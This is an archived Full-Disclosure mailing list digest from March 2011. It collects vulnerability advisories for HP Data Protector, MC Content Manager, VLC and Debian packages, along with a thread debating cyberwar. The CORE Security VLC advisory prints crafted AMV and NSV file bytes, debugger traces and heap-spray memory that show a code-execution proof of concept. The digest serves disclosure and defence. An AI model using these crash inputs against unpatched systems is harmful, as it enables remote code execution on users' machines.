a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-11-112: (0 day) Hewlett-Packard Data Protector Media Operations DBServer.exe Remote Code Execution Vulnerability

2011-03-23 Thread ZDI Disclosures
ZDI-11-112: (0 day) Hewlett-Packard Data Protector Media Operations 
DBServer.exe Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-112

March 23, 2011

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard Data Protector 

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10590. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of HP Data Protector. Authentication is not
required to exploit this vulnerability. 

The specific flaw exists within the DBServer.exe process which listens
by default on TCP port 19813. While parsing a request, the process
trusts a user-supplied 32-bit length value and uses it within a memory
operation. By specifying large enough values in a packet sent to the
service, a remote attacker can execute arbitrary code under the context
of the SYSTEM user.

-- Vendor Response:
March 23, 2011 - This vulnerability is being disclosed publicly without
a patch in accordance with the ZDI 180 day deadline.

-- Mitigations:
To mitigate this vulnerability an administrator could restrict
communication with this service to known client IP addresses.

-- Disclosure Timeline:
2010-09-24 - Vulnerability reported to vendor
2011-03-23 - Public release of advisory

-- Credit:
This vulnerability was discovered by:
* Roi Mallo

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



Re: [Full-disclosure] Materials regarding Cyber-war

2011-03-23 Thread imipak
On 14 March 2011 17:24, bk cho...@gmail.com wrote:


 On Mar 14, 2011, at 10:04 AM, imipak wrote:

 On 14/03/11 16:51, bk wrote:

  The point you missed is that almost all the examples we've seen so far
 have
  been closer to espionage than to actual warfare.

 [...]

  Despite that, I agree.  Espionage != War.  People hyping cyberwar are
 either trying
  to increase their sales, budget, or jurisdiction.
 


 Report: Iran's paramilitary launches cyber attack


 http://www.google.com/hostednews/ap/article/ALeqM5jlwiVKEhlj8CjRz6dzR-McTlnRHw

 -i


 Yes, let's put a lot of stock in propaganda that amounts to we're in ur
 hostin providerz, defacin ur websitez.

 This is from the same regime that photoshopped in extra missiles to make
 their capabilities look stronger.

 Grow up.




*cough*

http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/


-i

[Full-disclosure] XSS, AoF and IAA vulnerabilities in MC Content Manager

2011-03-23 Thread MustLive
Hello list!

I want to warn you about Cross-Site Scripting, Abuse of Functionality and 
Insufficient Anti-automation vulnerabilities in MC Content Manager. It's a 
Ukrainian commercial CMS.

-
Affected products:
-

Potentially all versions of MC Content Manager are vulnerable (MC Content 
Manager v.10.1.1 and previous versions).

--
Details:
--

XSS (WASC-08):

Vulnerabilities are at registration and password recovery pages.

http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS.html

http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS2.html

http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS3.html

Abuse of Functionality (WASC-42):

http://site/users/register

http://site/users/remind

At the registration and password recovery pages it's possible to enumerate 
the e-mails of the users (which are their logins).

Insufficient Anti-automation (WASC-21):

http://site/users/register

http://site/users/remind

Even though a captcha is used on these pages, it is not necessary to enter 
the correct captcha to enumerate the e-mails (logins) of the users.


Timeline:


2011.01.24 - announced at my site.
2011.01.25 - informed developers.
2011.01.25 - received response from developers.
2011.01.25 - gave additional recommendations for developers.
2011.03.22 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4869/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 




Re: [Full-disclosure] Materials regarding Cyber-war

2011-03-23 Thread coderman
On Wed, Mar 23, 2011 at 12:22 PM, imipak imi...@gmail.com wrote:
...
 *cough*

 http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/

re: The IP address of the initial attack was recorded and has been
determined to be assigned to an ISP in Iran. A web survey revealed one
of the certificates deployed on another IP address assigned to an
Iranian ISP. The server in question stopped responding to requests
shortly after the certificate was revoked
While the involvement of two IP addresses assigned to Iranian ISPs is
suggestive of an origin, this may be the result of an attacker
attempting to lay a false trail.

iran is pretty incompetent in most information technology respects.
odds strongly favor pwn hops through their unmonitored, unmaintained,
unhardened, sloppy conglomerations of servers and switches...*


and,
i suppose we can add RSA to the thread:
  http://www.schneier.com/blog/archives/2011/03/rsa_security_in.html

although any time someone blames ADVANCED persistent threat i like to
recall fondly the Aleatory threat,
  
https://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf
if you've been lazy on infosec, opsec for a while without calamity by
sheer luck, this is definitely the year your luck will run out. lazy
== pwned


* like all generalizations this is false, in whole yet frequently true in parts. ;)



[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files

2011-03-23 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

   Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

   VLC Vulnerabilities handling .AMV and .NSV files


1. *Advisory Information*

Title: VLC Vulnerabilities handling .AMV and .NSV files
Advisory ID: CORE-2011-0208
Advisory URL:
http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
Date published: 2011-03-23
Date of last update: 2011-03-23
Vendors contacted: VLC team
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3275, CVE-2010-3276


3. *Vulnerability Description*

Two vulnerabilities have been found in VLC media player [1], when
handling .AMV and .NSV file formats. These vulnerabilities can be
exploited by a remote attacker to obtain arbitrary code execution with
the privileges of the user running VLC.


4. *Vulnerable packages*

   . VLC 1.1.4
   . VLC 1.1.5
   . VLC 1.1.6
   . VLC 1.1.7
   . Older versions may be affected, but were not checked.


5. *Non-vulnerable packages*

   . VLC 1.1.8


6. *Vendor Information, Solutions and Workarounds*

These vulnerabilities are fixed in VLC version 1.1.8, which can be
downloaded from http://www.videolan.org/


7. *Credits*

These vulnerabilities were discovered and researched by Ricardo Narvaja
from Core Security Technologies. Publication was coordinated by Carlos
Sarraute.


8. *Technical Description / Proof of Concept Code*


8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files
[CVE-2010-3275]*

This vulnerability was found by fuzzing different formats. In AMV files
if the offset 0x41 is changed to a value greater than 90 as shown below:

/-
Offset(h)

  52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54  RIFFAMV LIST
0010  00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00  hdrlamvh8...
0020  24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00  $ô..
0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0040  A0 A0

- -/


Then the program will crash in the following plugin:

/-
Executable modules, item 248
Base=6D68
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.ModuleEntryPoint
  Name=libdir_1
  Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

- -/


More precisely in this location:

/-
6D6812A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
6D6812A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7    890424          MOV DWORD PTR SS:[ESP],EAX
6D6812AA    FF92 8000       CALL DWORD PTR DS:[EDX+80]

offset

06A1        8B10            MOV EDX,DWORD PTR DS:[EAX]
06A3        894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
06A7        890424          MOV DWORD PTR SS:[ESP],EAX
06AA        FF92 8000       CALL DWORD PTR DS:[EDX+80]

registers

EAX 3DD1255C
ECX 
EDX 3032344A
EBX 3DDF9410
ESP 3F82FC04
EBP 3DD1229C
ESI 3DD1255C
EDI 3DDF90BC
EIP 6D6812AA libdir_1.6D6812AA

- -/


When executing an appropriate heap spray in Internet explorer:

/-
303234CA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
303234DA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
303234EA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
303234FA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
3032350A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
3032351A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  
3032352A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  

- -/


We manage to take control of the execution flow and execute our code:

/-
0C0C0C0C    0C 0C           OR AL,0C
0C0C0C0E    0C 0C           OR AL,0C
0C0C0C10    0C 0C           OR AL,0C
0C0C0C12    0C 0C           OR AL,0C
0C0C0C14    0C 0C           OR AL,0C
0C0C0C16    0C 0C           OR AL,0C
0C0C0C18    0C 0C           OR AL,0C
0C0C0C1A    0C 0C           OR AL,0C
0C0C0C1C    0C 0C           OR AL,0C
0C0C0C1E    0C 0C           OR AL,0C
0C0C0C20    0C 0C           OR AL,0C
0C0C0C22    0C 0C           OR AL,0C
0C0C0C24    0C 0C           OR AL,0C
0C0C0C26    0C 0C           OR AL,0C

- -/



8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files
[CVE-2010-3276]*

In NSV files when changing the offsets 0x0b to 0x0e as shown below:

/-
Offset(h)

  4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01  NSVsVP31MP3_._..

- -/


We can make the program crash in the following plugin:

/-
Executable modules, item 248
Base=6D68
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.ModuleEntryPoint
Name=libdir_1
Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

- -/


More precisely in this location:

/-
6D6812A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
6D6812A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7   

[Full-disclosure] [SECURITY] [DSA 2199-1] iceape security update

2011-03-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2199-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
March 23, 2011                         http://www.debian.org/security/faq
- -

Package: iceape
Vulnerability  : none in iceape
Problem type   : none in iceape
Debian-specific: no
CVE ID : not available

This update for the Iceape internet suite, an unbranded version of
Seamonkey, updates the certificate blacklist for several fraudulent
HTTPS certificates. 

More details can be found in a blog posting by Jacob Appelbaum of the 
Tor project:
https://blog.torproject.org/category/tags/ssl-tls-ca-tor-certificates-torbrowser

The oldstable distribution (lenny) is not affected. The iceape package only
provides the XPCOM code.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-4.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.13-1.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk2KW5cACgkQXm3vHE4uylo0AQCgnWxJzIs6SUjXuhhHuJvFRVPA
GsEAnR30DuJBPIDHD2yWGqx2hDcBRgxV
=2v7I
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2200-1] iceweasel security update

2011-03-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2200-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
March 23, 2011                         http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : none in iceweasel
Problem type   : none in iceweasel
Debian-specific: no
CVE ID : not available

This update for Iceweasel, a web browser based on Firefox, updates the
certificate blacklist for several fraudulent HTTPS certificates. More 
details can be found in a blog posting by Jacob Appelbaum of the Tor
project:

https://blog.torproject.org/category/tags/ssl-tls-ca-tor-certificates-torbrowser

For the oldstable distribution (lenny), this problem has been fixed in
version 1.9.0.19-9 of the xulrunner source package.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-6.

For the unstable distribution (sid), this problem has been fixed in
version 3.5.18-1.

For the experimental distribution, this problem has been fixed in
version 4.0~rc2-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk2KXjwACgkQXm3vHE4uylrljgCgxyjj11P46OhefLrw8A7B3A6v
HVgAn2y4vZH4H6UB88wB6x6NqeQ7J+Mj
=ZoU0
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2201-1] wireshark security update

2011-03-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2201-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
March 23, 2011                         http://www.debian.org/security/faq
- -

Package: wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0538 CVE-2011-0713 CVE-2011-1139 CVE-2011-1140 
CVE-2011-1141

Huzaifa Sidhpurwala, Joernchen, and Xiaopeng Zhang discovered several
vulnerabilities in the Wireshark network traffic analyzer.
Vulnerabilities in the DCT3, LDAP and SMB dissectors and in the code to
parse pcap-ng files could lead to denial of service or the execution of
arbitrary code.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.0.2-3+lenny13.

For the stable distribution (squeeze), this problem has been fixed in
version 1.2.11-6+squeeze1.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.4-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk2KaxwACgkQXm3vHE4uylpBkgCfabAzulwiyFi/phmPHYyU7Nxm
47sAn03CFpWP+fJ6n3SSbZ9EAwHyjagF
=DTar
-END PGP SIGNATURE-



Re: [Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files

2011-03-23 Thread Dan Rosenberg
Hmm...well, this is one vulnerability, not two, and it was fixed in
VLC's tree on February 12.  Still a nice find.

-Dan

On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories
advisor...@coresecurity.com wrote:

Re: [Full-disclosure] Materials regarding Cyber-war

2011-03-23 Thread Marcio B. Jr.
By the way,
if you have kernel sources installed mainly, interesting stuff appears
when you grep warfare as root:


# grep --recursive --ignore-case -s warfare /


including some SPACE & NAVAL WARFARE SYSTEMS' drivers' information and all.


Oh, and espionage is a part of the thing, not a distinct subject.


Regards,



On Wed, Mar 23, 2011 at 5:33 PM, coderman coder...@gmail.com wrote:
 On Wed, Mar 23, 2011 at 12:22 PM, imipak imi...@gmail.com wrote:
...
 *cough*

 http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/

 re: The IP address of the initial attack was recorded and has been
 determined to be assigned to an ISP in Iran. A web survey revealed one
 of the certificates deployed on another IP address assigned to an
 Iranian ISP. The server in question stopped responding to requests
 shortly after the certificate was revoked
 While the involvement of two IP addresses assigned to Iranian ISPs is
 suggestive of an origin, this may be the result of an attacker
 attempting to lay a false trail.

 iran is pretty incompetent in most information technology respects.
 odds strongly favor pwn hops through their unmonitored, unmaintained,
 unhardened, sloppy conglomerations of servers and switches...*


 and,
 i suppose we can add RSA to the thread:
  http://www.schneier.com/blog/archives/2011/03/rsa_security_in.html

 although any time someone blames ADVANCED persistent threat i like to
 recall fondly the Aleatory threat,
  https://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf
 if you've been lazy on infosec, opsec for a while without calamity by
 sheer luck, this is definitely the year your luck will run out. lazy
 == pwned


 * like all generalizations this is false, in whole yet frequently true in parts. ;)





Marcio Barbado, Jr.


Re: [Full-disclosure] Materials regarding Cyber-war

2011-03-23 Thread bk

On Mar 23, 2011, at 12:22 PM, imipak wrote:

 
 On 14 March 2011 17:24, bk cho...@gmail.com wrote:
 
 On Mar 14, 2011, at 10:04 AM, imipak wrote:
 
 On 14/03/11 16:51, bk wrote:
 
  The point you missed is that almost all the examples we've seen so far 
  have
  been closer to espionage than to actual warfare.
 
 [...]
 
  Despite that, I agree.  Espionage != War.  People hyping cyberwar are 
  either trying
  to increase their sales, budget, or jurisdiction. 
  
 
 
 Report: Iran's paramilitary launches cyber attack
 
 http://www.google.com/hostednews/ap/article/ALeqM5jlwiVKEhlj8CjRz6dzR-McTlnRHw
 
 -i
 
 Yes, let's put a lot of stock in propaganda that amounts to we're in ur 
 hostin providerz, defacin ur websitez.
 
 This is from the same regime that photoshopped in extra missiles to make 
 their capabilities look stronger.
 
 Grow up.
  
 
 
 *cough*
 
 http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/
 
 
 -i

Spying on your own citizens is considered cyberwar now?  That's *if* (and 
it's a big if), we actually believe it was an attack sponsored by the Iranian 
state.

--
chort
